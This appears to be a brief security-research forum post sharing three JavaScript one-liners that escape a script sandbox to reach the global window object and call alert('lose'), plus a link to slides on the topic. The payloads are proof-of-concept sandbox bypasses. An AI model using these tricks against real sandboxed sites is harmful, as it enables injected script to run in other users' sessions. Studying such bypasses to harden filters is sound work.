Waldo has some awesome examples:-
({}).valueOf.call(null).alert('lose');
[].sort.call(null).alert('lose')
({}.constructor.prototype.toString=function(){return "f".constructor.fromCharCode(95,95,112,97,114,101,110,116,95,95);}, y={},y[{}].alert('lose'))
Nice one Waldo
Some more awesome examples available here:-
http://stuff.mit.edu/iap/facebook/slides2/
------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [
www.businessinfo.co.uk]
blog : [
www.thespanner.co.uk]
Hackvertor : [
hackvertor.co.uk]